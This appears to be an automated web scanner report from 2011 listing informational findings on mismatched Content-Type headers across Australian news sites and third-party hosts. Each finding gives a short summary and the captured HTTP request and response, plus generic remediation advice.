Date: Wed, 07 Sep 2011 14:15:06 GMT
Content-Length: 19340

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<!-- #BeginTempla
...[SNIP]...

21. Content type incorrectly stated previous next
There are 41 instances of this issue:

http://a3.twimg.com/profile_images/195539297/6PRlogo-Thumbnail-48x48_normal.gif
http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090
http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList
http://news.smh.com.au/action/pingServerAction
http://resources.news.com.au/cs/newscomau/images/favicon.ico
http://resources.news.com.au/cs/perthnow/images/favicon.ico
http://resources0.news.com.au/images/2010/06/15/1225879/957752-wine-glass.gif
http://resources2.news.com.au/images/2011/08/01/1226106/127606-economy.gif
http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22
http://tools.ntnews.com.au/feeds/feed-breakingnews-datelist.php
http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php
http://tools.ntnews.com.au/search-results/adsense_frontpage_js.php
http://tools.ntnews.com.au/search-results/adsense_frontpage_js3.php
http://tools.ntnews.com.au/weather/weather_panel.php
http://tools.ntnews.com.au/yoursay/article_page_comments.php
http://tools.ntnews.com.au/yoursay/article_single_comment.php
http://tools.themercury.com.au/feeds/feed-ticker.php
http://tools.themercury.com.au/feeds/feed-with-lead.php
http://tools.themercury.com.au/misc/datetime.php
http://tools.themercury.com.au/photo-gallery/featuredgallery.php
http://tools.themercury.com.au/search-results/adsense_js.php
http://tools.themercury.com.au/search-results/adsense_wide_js_skip3.php
http://tools.themercury.com.au/video/featuredvideo.php
http://tools.themercury.com.au/weather/weather_inc.php
http://tools.themercury.com.au/yoursay/article_page_comments.php
http://tools.themercury.com.au/yoursay/yoursay-single-extract.php
http://www.7perth.com.au/javascript.js
http://www.abc.net.au/favicon.ico
http://www.abc.net.au/res/abc/submenus.htm
http://www.bcl.com.au/perth/x-topimg.txt
http://www.bcl.com.au/x-footer.txt
http://www.facebook.com/extern/login_status.php
http://www.ntnews.com.au/images/global/icons/arrow-orange.gif
http://www.ntnews.com.au/scripts/track-call.js
http://www.ntnews.com.au/scripts/track-header.js
http://www.smh.com.au/action/pingServerAction
http://www.smh.com.au/favicon.ico
http://www.themercury.com.au/images/horoscopes-background.gif
http://www.themercury.com.au/scripts/track-call.js
http://www.themercury.com.au/scripts/track-header.js
http://www.watoday.com.au/action/pingServerAction

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

21.1. http://a3.twimg.com/profile_images/195539297/6PRlogo-Thumbnail-48x48_normal.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a3.twimg.com
Path:	/profile_images/195539297/6PRlogo-Thumbnail-48x48_normal.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/195539297/6PRlogo-Thumbnail-48x48_normal.gif HTTP/1.1
Host: a3.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.6pr.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: ggYm/m1vyvOYVFl9865bp5sLpKJH22xUYVynx/1NEVBtnsxgCzScP9h7USsF11Uk
x-amz-request-id: C40C93029E3623E5
Last-Modified: Mon, 04 May 2009 04:12:21 GMT
ETag: "bc24f7042b1b43e764c2facfb18b3dbb"
Accept-Ranges: bytes
Content-Length: 1756
Server: AmazonS3
Cache-Control: max-age=27940816
Expires: Thu, 26 Jul 2012 23:34:54 GMT
Date: Wed, 07 Sep 2011 14:14:38 GMT
Connection: close
Content-Type: image/gif
X-CDN: AKAM

.PNG
.
...IHDR...0...0.....`. .....PLTE.+R.,R.-T..T..V.0U.0V.1W.2X.2X 5Z6[.7\.8\.9].9^.:^.;^.<_.?a.?b.?c.@c.Ad.Dh Fh#Hj#Jj$Ij%Km'Ln)Ii(Lm(Ln+On.No*Op-Op.Rr/Tt1Ts1Uu4Ts4Ut5Vt5Wv3Xu6Xv7Yx8Xw?^{?^|@_|
...[SNIP]...

21.2. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://feed.video.news.com.au
Path:	/f/g5OqK/8MZ0EQEjgP7F/2120022090

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /f/g5OqK/8MZ0EQEjgP7F/2120022090?callback=_jqjsp HTTP/1.1
Host: feed.video.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Last-Modified: Wed, 07 Sep 2011 11:23:40 GMT
Access-Control-Allow-Origin: *
Server: Jetty(6.1.19)
Content-Length: 5188
Vary: Accept-Encoding
Expires: Wed, 07 Sep 2011 14:19:35 GMT
Date: Wed, 07 Sep 2011 14:14:53 GMT
Connection: close

_jqjsp({"$xmlns":{"pl1":"http://mps.theplatform.com/data/Account/178843232","dcterms":"http://purl.org/dc/terms/","media":"http://search.yahoo.com/mrss/","pl":"http://xml.theplatform.com/data/object",
...[SNIP]...

21.3. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ndm.feeds.theplatform.com
Path:	/ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain;charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=1&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: max-age=300
Expires: Wed, 07 Sep 2011 14:19:45 GMT
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:45 GMT
X-Cache: HIT from feeds.theplatform.com
Via: 1.0 sea1squid02 (squid/3.0.STABLE23)
Connection: close

_jqjsp({"context":"","listInfo":{"itemCount":20,"totalCount":22},"items":[{"airdate":1315379040000,"assets":[{"assetType":"Reference Image","encodingProfile":"","height":366,"URL":"http://content.vide
...[SNIP]...

21.4. http://news.smh.com.au/action/pingServerAction previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://news.smh.com.au
Path:	/action/pingServerAction

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /action/pingServerAction?par=2608937&type=Article&s=Breaking+News+National&i=&v=725681 HTTP/1.1
Host: news.smh.com.au
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1315422900111; k_visit=1

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 07 Sep 2011 14:18:36 GMT
X-Cnection: close
Content-Language: en-AU
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Length: 80
Content-Type: text/html;charset=UTF-8
Expires: Wed, 07 Sep 2011 14:18:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:18:36 GMT
Connection: close
Vary: Accept-Encoding

{
time : "<em>12:15AM</em> Thursday Sep 08, 2011",
people : "1,404"
}

21.5. http://resources.news.com.au/cs/newscomau/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://resources.news.com.au
Path:	/cs/newscomau/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /cs/newscomau/images/favicon.ico HTTP/1.1
Host: resources.news.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=YH7RvubFqqQ-XJ0QeTh

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 18 May 2011 08:34:20 GMT
ETag: "66f173-47e-4a388c1413b00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=717
Expires: Wed, 07 Sep 2011 14:29:41 GMT
Date: Wed, 07 Sep 2011 14:17:44 GMT
Connection: close

............ .h.......(....... ..... .........................!!!.!!!.!!!.!!!.!!!.!!!...............!!!.!!!.!!!.!!!.!!!.!!!.!!!.!!!.!!!.!!!.!!!.!!!.................!!!.!!!.!!!.!!!.!!!.!!!.!!!.!!!...
...[SNIP]...

21.6. http://resources.news.com.au/cs/perthnow/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://resources.news.com.au
Path:	/cs/perthnow/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /cs/perthnow/images/favicon.ico HTTP/1.1
Host: resources.news.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 18 May 2011 08:34:28 GMT
ETag: "275c4e5-57e-4a388c1bb4d00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=30
Expires: Wed, 07 Sep 2011 14:15:34 GMT
Date: Wed, 07 Sep 2011 14:15:04 GMT
Connection: close

..............h.......(....... ................................G:.....tEg.CR..?M.......GE.^s..=I............x..........t..yF\.....DS..........Oa...SF.....NG..?L..........Sf..BP..<I..:G......s~..d{....
...[SNIP]...

21.7. http://resources0.news.com.au/images/2010/06/15/1225879/957752-wine-glass.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://resources0.news.com.au
Path:	/images/2010/06/15/1225879/957752-wine-glass.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/2010/06/15/1225879/957752-wine-glass.gif HTTP/1.1
Host: resources0.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 06 Sep 2011 06:15:19 GMT
ETag: "5a8b6c-e6d-4ac3fc07a4bc0"
Accept-Ranges: bytes
Content-Length: 3693
Content-Type: image/gif
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=91
Expires: Wed, 07 Sep 2011 14:15:37 GMT
Date: Wed, 07 Sep 2011 14:14:06 GMT
Connection: close

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................K.d..
...[SNIP]...

21.8. http://resources2.news.com.au/images/2011/08/01/1226106/127606-economy.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://resources2.news.com.au
Path:	/images/2011/08/01/1226106/127606-economy.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/2011/08/01/1226106/127606-economy.gif HTTP/1.1
Host: resources2.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 09 Aug 2011 08:42:19 GMT
ETag: "cfd2e5-1146-4aa0e8aa250c0"
Accept-Ranges: bytes
Content-Length: 4422
Content-Type: image/gif
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=474
Expires: Wed, 07 Sep 2011 14:22:00 GMT
Date: Wed, 07 Sep 2011 14:14:06 GMT
Connection: close

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................K.d..
...[SNIP]...

21.9. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.ntnews.com.au
Path:	/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

21.10. http://tools.ntnews.com.au/feeds/feed-breakingnews-datelist.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.ntnews.com.au
Path:	/feeds/feed-breakingnews-datelist.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.11. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.ntnews.com.au
Path:	/photo-gallery/photo_galleries_js.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.12. http://tools.ntnews.com.au/search-results/adsense_frontpage_js.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.ntnews.com.au
Path:	/search-results/adsense_frontpage_js.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.13. http://tools.ntnews.com.au/search-results/adsense_frontpage_js3.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.ntnews.com.au
Path:	/search-results/adsense_frontpage_js3.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.14. http://tools.ntnews.com.au/weather/weather_panel.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.ntnews.com.au
Path:	/weather/weather_panel.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.15. http://tools.ntnews.com.au/yoursay/article_page_comments.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.ntnews.com.au
Path:	/yoursay/article_page_comments.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.16. http://tools.ntnews.com.au/yoursay/article_single_comment.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.ntnews.com.au
Path:	/yoursay/article_single_comment.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.17. http://tools.themercury.com.au/feeds/feed-ticker.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-ticker.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.18. http://tools.themercury.com.au/feeds/feed-with-lead.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-with-lead.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.19. http://tools.themercury.com.au/misc/datetime.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/misc/datetime.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.20. http://tools.themercury.com.au/photo-gallery/featuredgallery.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/photo-gallery/featuredgallery.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.21. http://tools.themercury.com.au/search-results/adsense_js.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/search-results/adsense_js.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.22. http://tools.themercury.com.au/search-results/adsense_wide_js_skip3.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/search-results/adsense_wide_js_skip3.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.23. http://tools.themercury.com.au/video/featuredvideo.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/video/featuredvideo.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.24. http://tools.themercury.com.au/weather/weather_inc.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/weather/weather_inc.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.25. http://tools.themercury.com.au/yoursay/article_page_comments.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/yoursay/article_page_comments.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.26. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/yoursay/yoursay-single-extract.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

21.27. http://www.7perth.com.au/javascript.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.7perth.com.au
Path:	/javascript.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /javascript.js?file=validation&a=springform HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2

Response

HTTP/1.1 200 OK
Cache-Control: public, maxage=31536000
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:14:21 GMT
Expires: Thu, 06 Sep 2012 14:14:21 GMT
Pragma: public
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Content-Length: 29
Connection: keep-alive

new Validation('springform');

21.28. http://www.abc.net.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.abc.net.au
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABCGuestID=http%3A//www.abc.net.au/perth/news/%3DPerth%20News%20-%20ABC%20Perth%20-%20Australian%20Broadcasting%20Corporation; __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315476868902:ss=1315476868902; SiteLifeHost=SJL02WSITEMABC1proddmlocal; anonId=f1e9cf78-d41c-4410-9c98-2b8c34e350af

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 02 Dec 2009 12:44:12 GMT
ETag: "e683fd-47e-3b457f00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain
Cache-Control: max-age=290
Expires: Wed, 07 Sep 2011 14:19:07 GMT
Date: Wed, 07 Sep 2011 14:14:17 GMT
Connection: close

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...

21.29. http://www.abc.net.au/res/abc/submenus.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.abc.net.au
Path:	/res/abc/submenus.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

21.30. http://www.bcl.com.au/perth/x-topimg.txt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bcl.com.au
Path:	/perth/x-topimg.txt

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /perth/x-topimg.txt HTTP/1.1
Host: www.bcl.com.au
Proxy-Connection: keep-alive
Referer: http://www.bcl.com.au/perth/news.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 05 Aug 2009 03:28:02 GMT
Accept-Ranges: bytes
ETag: "f94ccfbc7c15ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:29 GMT
Content-Length: 1312

...document.write('<map name="FPMap0_I1"><area href="http://www.brisbanecitylife.com.au/bcl/" shape="rect" coords="89, 31, 149, 46" alt="Brisbane" /><area href="http://www.bcl.com.au/adelaide/" shape=
...[SNIP]...

21.31. http://www.bcl.com.au/x-footer.txt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bcl.com.au
Path:	/x-footer.txt

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /x-footer.txt HTTP/1.1
Host: www.bcl.com.au
Proxy-Connection: keep-alive
Referer: http://www.bcl.com.au/perth/news.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 06 Jan 2011 23:59:10 GMT
Accept-Ranges: bytes
ETag: "5eef38b6fdadcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:29 GMT
Content-Length: 835

...document.write('<b><a href="http://www.bcl.com.au/">www.BCL.com.au</a></b> is produced by <a href="http://www.onlineencounters.com.au/">Online Encounters Pty Ltd</a><br />Please email any comments
...[SNIP]...

21.32. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14a86f45%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff101df2ba4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33d4a10a8%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff101df2ba4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a1de3c14%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b4b331e%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff101df2ba4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a1de3c14&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28bba56%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff101df2ba4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a1de3c14&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df129d02d68%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff101df2ba4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a1de3c14&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
